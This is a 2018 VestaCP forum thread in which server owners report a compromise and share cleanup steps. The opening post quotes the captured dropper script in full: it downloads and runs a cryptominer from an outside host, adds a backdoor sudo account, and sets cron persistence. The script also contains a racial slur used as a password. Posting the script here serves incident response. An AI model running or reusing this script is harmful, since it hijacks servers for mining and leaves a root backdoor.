Vesta Control Panel - Forum

Community Forum
https://forum.vestacp.com/

have been HACKED ! by xaxaxa.eu

https://forum.vestacp.com/viewtopic.php?f=10&t=17183

Page 1 of 5

have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 12:43 am
by sauvegardezvous99
hello team,

just hacked by a dump hacker who use xaxaxa.eu/* and some sh script.
I am currently investiguating if vesta was on release 22.

/tmp/load.sh

Code: Select all

if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    wget -O /tmp/gcc http://xaxaxa.eu/gcc;
    chmod +x gcc;
    wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi
/tmp/config_1.json

Code: Select all

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-priority": null,
    "donate-level": 0,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool1.xaxaxa.eu:28000",
            "user": "lol",
            "pass": "lol",
            "keepalive": true,
            "nicehash": false,
            "variant": -1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "syslog": false,
    "threads": null
}
some file have been altered , what do you need to know if your patch covers that attempt ?

thank you ,

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 3:58 am
by ScIT
Can you send a more informations about creation time of the files? Vesta Dev team has patched this issue with release 22, for further investigation we need to be sure that the infection was after upgrade to 22.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 6:43 am
by aximus
I have the same problem.

Running:

Code: Select all

apt-get update
and

Code: Select all

apt-get install vesta
Gives me:

Code: Select all

vesta is already the newest version (0.9.8-20)
But that's not the latest version, is it?

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 6:50 am
by Spheerys
I was hacked too by the same script.
To stop kickly and dirty, I have mount /tmp with noexec parameter :

Code: Select all

/dev/xvdc             /tmp                    ext4    loop,noexec,nosuid,nodev,rw  0 0
And edit my /etc/hosts like this :

Code: Select all

127.0.0.1	bigbatman.loan xaxaxa.eu
but the malware is still there...

The files /tmp/load.sh and /tmp/gcc was owned by admin user, the same as vestacp use...

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 6:53 am
by ScIT
As you can read in the red banner in the forum, the newest version is 0.9.8-22. Please do:

Code: Select all

apt-get update && apt-get upgrade -y
cd /usr/local/vesta/bin
./v-update-sys-vesta-all
This should update your system, normaly also vesta. Additional we start the internal upgrade script from vestacp in last part.

Then you can run this, when you get the same output, vesta is up to date:

Code: Select all

# cd /usr/local/vesta/bin
# ./v-list-sys-vesta-updates
PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-25
vesta-php    0.9.8  21   amd64  yes   2018-05-17
vesta-nginx  0.9.8  21   amd64  yes   2018-05-17
Based on the informations I have and see, it is normal that the vesta-php and nginx package is on release 21.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 6:54 am
by ScIT
Spheerys wrote:
Tue Jun 26, 2018 6:50 am
 I was hacked too by the same script.
To stop kickly and dirty, I have mount /tmp with noexec parameter :

Code: Select all

/dev/xvdc             /tmp                    ext4    loop,noexec,nosuid,nodev,rw  0 0
And edit my /etc/hosts like this :

Code: Select all

127.0.0.1	bigbatman.loan xaxaxa.eu
but the malware is still there...
based we try to answer the question "is the patch working": Did you upgraded to actual release?

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:00 am
by Spheerys
I did the recommanded upgrade but the malware is still present.
It insert a file on /etc/cron/d/php5 with this content :

Code: Select all

29 */3 * * * root [ -x /usr/lib/php5/sessionclean ] && /usr/lib/php5/sessionclean
And the /usr/lib/php5/sessionclean is :

Code: Select all

/usr/lib/php5/sessionclean                                                                        2730/2730              100%
#!/bin/sh -e
#
# sessionclean - a script to cleanup stale PHP sessions
#
# Copyright 2013-2015 Ondřej Surý <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

SAPIS="apache2:apache2 apache2filter:apache2 cgi:php5 fpm:php5-fpm cli:php5"

# Iterate through all web SAPIs
(
proc_names=""
for sapi in ${SAPIS}; do
    conf_dir=${sapi%%:*}
    proc_name=${sapi##*:}
    if [ -e /etc/php5/${conf_dir}/php.ini ]; then
        # Get all session variables once so we don't need to start PHP to get each config option
        session_config=$(PHP_INI_SCAN_DIR=/etc/php5/${conf_dir}/conf.d/ php5 -c /etc/php5/${conf_dir}/php.ini -d "error_repor
ting='~E_ALL'" -r 'foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";')
        save_handler=$(echo "$session_config" | sed -ne 's/^session\.save_handler=\(.*\)$/\1/p')
        save_path=$(echo "$session_config" | sed -ne 's/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p')
        gc_maxlifetime=$(($(echo "$session_config" | sed -ne 's/^session\.gc_maxlifetime=\(.*\)$/\1/p')/60))

        if [ "$save_handler" = "files" -a -d "$save_path" ]; then
            proc_names="$proc_names $proc_name";
            printf "%s:%s\n" "$save_path" "$gc_maxlifetime"
        fi
    fi
done
# first find all open session files and touch them (hope it's not massive amount of files)
for pid in $(pidof $proc_names); do
    find "/proc/$pid/fd" -ignore_readdir_race -lname "$save_path/sess_\*" -exec touch -c {} \; 2>/dev/null
done
) | sort -rn -t: -k2,2 | sort -u -t: -k 1,1 | while IFS=: read -r save_path gc_maxlifetime; do
    # find all files older then maxlifetime and delete them
    find -O3 "$save_path/" -ignore_readdir_race -depth -mindepth 1 -name 'sess_*' -type f -cmin "+$gc_maxlifetime" -delete
done

exit 0

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:02 am
by ScIT
The upgrade does NOT remove the infection. If you are infected, you have to remove manually. The upgrade "only" fixes the security issue, that can cause an infection.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:08 am
by Spheerys
OK thanks.
I will document what I found to help cleaning for other...

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:21 am
by Spheerys
Tutorial to stop the attack
It's not bullet proof and writen kickly and dirty : just cleaning what I have found and you may have to adapt it.

First, upgrade your system and VestaCP :

Code: Select all

apt-get update && apt-get upgrade -y
cd /usr/local/vesta/bin
./v-update-sys-vesta-all

Look on this file or similar : /etc/cron/d/php5
If you are sure what you are doing, delete it.

Edit /usr/local/vesta/data/users/admin/cron.conf and remove last lines about the malware
Rebuild the vestacp cron of the admin user : v-rebuild-cron-jobs admin restart

Remove lastest lines of thoses files (which are talikng about sysroot account) :
  • /etc/passwd
  • /etc/group
  • /etc/gshadow
  • /etc/subuid
  • /etc/shadow
  • /etc/sudoers ((several lines !!!)

Usefull tips :
- you can mount the /tmp partition with the noexec parameter to avoid execution script.
- you can edit your /etc/hosts file to avoid the connections on the distant malware scripts
- command to find the files modified during the last 600 minutes : find /usr/ -cmin -600
All times are UTC
Page 1 of 5
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/